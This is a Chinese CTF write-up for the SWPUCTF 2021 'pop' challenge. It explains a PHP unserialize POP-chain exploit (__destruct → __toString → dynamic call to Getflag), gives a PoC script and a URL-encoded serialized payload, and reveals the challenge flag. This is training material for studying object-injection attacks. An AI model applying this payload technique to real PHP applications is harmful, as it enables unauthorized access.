题目源码

 <?php

error_reporting(0);

show_source("index.php");

class w44m{

    private $admin = 'aaa';

    protected $passwd = '123456';

    public function Getflag(){

        if($this->admin === 'w44m' && $this->passwd ==='08067'){

            include('flag.php');

            echo $flag;

        }else{

            echo $this->admin;

            echo $this->passwd;

            echo 'nono';

        }

    }

}

class w22m{

    public $w00m;

    public function __destruct(){

        echo $this->w00m;

    }

}

class w33m{

    public $w00m;

    public $w22m;

    public function __toString(){

        $this->w00m->{$this->w22m}();

        return 0;

    }

}

$w00m = $_GET['w00m'];

unserialize($w00m);

?>

解题分析

pop链构造从魔术方法入手

通过反推得到 w22m中的destruct是第一个利用点

在该函数利用下 会通过echo输出

输出什么内容不要紧 最重要的是输出的这个行为 等于是将数据变成了string类型的字符串

这样就会触发到w33m中的tostring函数

该函数会触发动态调用方法

$this->w00m是一个对象,而$this->w22m则是该对象的一个属性名。

代码中使用了动态方法调用语法,通过->{$this->w22m}()可以调用 $this->w00m对象的某个方法。

那么 通过构造具体的方法名 可以去触发Getflag方法 也就是说这里可以将{$this->w22m}()的值设为Getflag就行

另外还需要注意这里存在protect属性 最后要url编码防止报错

POC

<?php

class w44m{

    private $admin = 'w44m';

    protected $passwd = '08067';

}

class w22m{

    public $w00m;

}

class w33m{

    public $w00m;

    public $w22m;

}

$a = new w22m();

$a->w00m = new w33m();

$a->w00m->w00m=new w44m();

$a->w00m->w22m='Getflag';

echo urlencode(serialize($a));

?>

得到payload

O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D

传参得到flag

NSSCTF{bd41570c-ef1f-44b6-bed4-78b8f31b0749}

[SWPUCTF 2021 新生赛]pop的更多相关文章

  1. SCNU ACM 2016新生赛初赛 解题报告

    新生初赛题目.解题思路.参考代码一览 1001. 无聊的日常 Problem Description 两位小朋友小A和小B无聊时玩了个游戏,在限定时间内说出一排数字,那边说出的数大就赢,你的工作是帮他 ...

  2. SCNU 2015ACM新生赛决赛【F. Oyk闯机关】解题报告

            题目大意:一个$N$$\times$$N$的阵列,每个格子有$X_{ij}$个调和之音,若每次只能选择走右边或下边,从左上角出发走到右下角,问最多能收集到多少个调和之音?       ...

  3. Codeforces 801 A.Vicious Keyboard & Jxnu Group Programming Ladder Tournament 2017江西师大新生赛 L1-2.叶神的字符串

    A. Vicious Keyboard time limit per test 2 seconds memory limit per test 256 megabytes input standard ...

  4. [ACTF2020 新生赛]BackupFile && [ACTF2020 新生赛]Upload &&[GYCTF2020]Blacklist

    [ACTF2020 新生赛]BackupFile 尝试找到源代码,加上题目是备份文件,猜测备份文件里面有网站的源代码,御剑扫描一下,就扫到index.php 访问index.php.bak 下载源代码 ...

  5. [BUUCTF]REVERSE——[ACTF新生赛2020]Oruga

    [ACTF新生赛2020]Oruga 附件 步骤: 例行检查,64位程序,无壳 64位ida载入,检索字符串,根据提示来到关键函数 14行~18行就是让字符串的前5位是 actf{ ,sub_78A( ...

  6. [BUUCTF]REVERSE——[ACTF新生赛2020]usualCrypt

    [ACTF新生赛2020]usualCrypt 附件 步骤: 例行检查,无壳,32位程序 32位ida载入,直接看main函数 逻辑很简单,一开始让我们输入一个字符串,然后该字符串经过sub_4010 ...

  7. [BUUCTF]REVERSE——[ACTF新生赛2020]rome

    [ACTF新生赛2020]rome 附件 步骤 无壳,32位程序 32位ida载入,根据提示字符串"You are correct!",找到关键函数func v15 = 'Q'; ...

  8. [BUUCTF]REVERSE——[ACTF新生赛2020]easyre

    [ACTF新生赛2020]easyre 附件 步骤 查壳,32位程序,upx壳儿 脱完壳儿,扔进ida 分析 一开始给我们定义了一个数组, v4=[42,70,39,34,78,44,34,40,73 ...

  9. 2021江西省赛线下赛赛后总结(Crypto)

    2021江西省赛线下赛 crypto1 题目: from random import randint from gmpy2 import * from Crypto.Util.number impor ...

  10. 2021广东工业大学新生赛决赛 L-歪脖子树下的灯

    题目:L-歪脖子树下的灯_2021年广东工业大学第11届腾讯杯新生程序设计竞赛(同步赛) (nowcoder.com) 比赛的时候没往dp这方面想(因为之前初赛和月赛数学题太多了啊),因此只往组合数学 ...

随机推荐

  1. 实战研究:提升Web应用的安全性

    @charset "UTF-8"; .markdown-body { line-height: 1.75; font-weight: 400; font-size: 15px; o ...

  2. 1+2+...+n

    时间限制:C/C++ 1秒,其他语言2秒 空间限制:C/C++ 32M,其他语言64M 题目描述 求1+2+3+...+n,要求不能使用乘除法.for.while.if.else.switch.cas ...

  3. ArkUI-X跨平台框架接入指南

    ArkUI跨平台框架(ArkUI-X)进一步将ArkUI开发框架扩展到了多个OS平台:目前支持OpenHarmony.Android. iOS,后续会逐步增加更多平台支持.开发者基于一套主代码,就可以 ...

  4. Axis in DataFrame

    Axis in DataFrame Optional parameter axis may appear in arithmetric between DataFrame and Series,the ...

  5. PyQt5高清屏幕自适应设置 QApplication.setAttribute(Qt.AA_EnableHighDpiScaling)

    Qt Designer 设计界面: 在高清屏未设置AA_EnableHighDpiScaling的预览界面:布局字体控件尺寸上明显存在偏差. 设置了AA_EnableHighDpiScaling的预览 ...

  6. C#中无法将文件”obj\debug\XXX.dll复制到“bin\Debug\XXX.dll” 拒绝访问

    较为方便有效的方法就是,把项目属性中的"应用程序集"的"程序集名称"修改为另一个名称即可.

  7. 做自己的第一个网站(Bootscrapt、odoo14作、JQuery)

    今天发布自己的第一个网站,网站内容是关于自己家乡的美景,效果图如下:网站地址是:http://hxmelon.com/ 二.技术篇 1.在这里网站用的是Bootscrapt框架作为网站开发模板.前端语 ...

  8. 前/后向自动微分的简单推导与rust简单实现

    自动微分不同于数值微分与符号微分, 能够在保证速度的情况下实现高精度的求某个可微函数的定点微分值. 下面将简要介绍其原理, 并给出 rust 的两种微分方式的基本实现. 微分方法简介 数值微分 利用微 ...

  9. UFT 模拟鼠标(包括fireEvent) & 键盘操作

    1. 鼠标 2. 键盘 3. UFT FireEvent 实现多样JS 操作

  10. Jit 报错TracingCheckError:ERROR: Graphs differed across invocations!

    问题描述 使用Tinynn将Pytorch转化为tflite时报错: 发生异常: TracingCheckError (note: full exception trace is shown but ...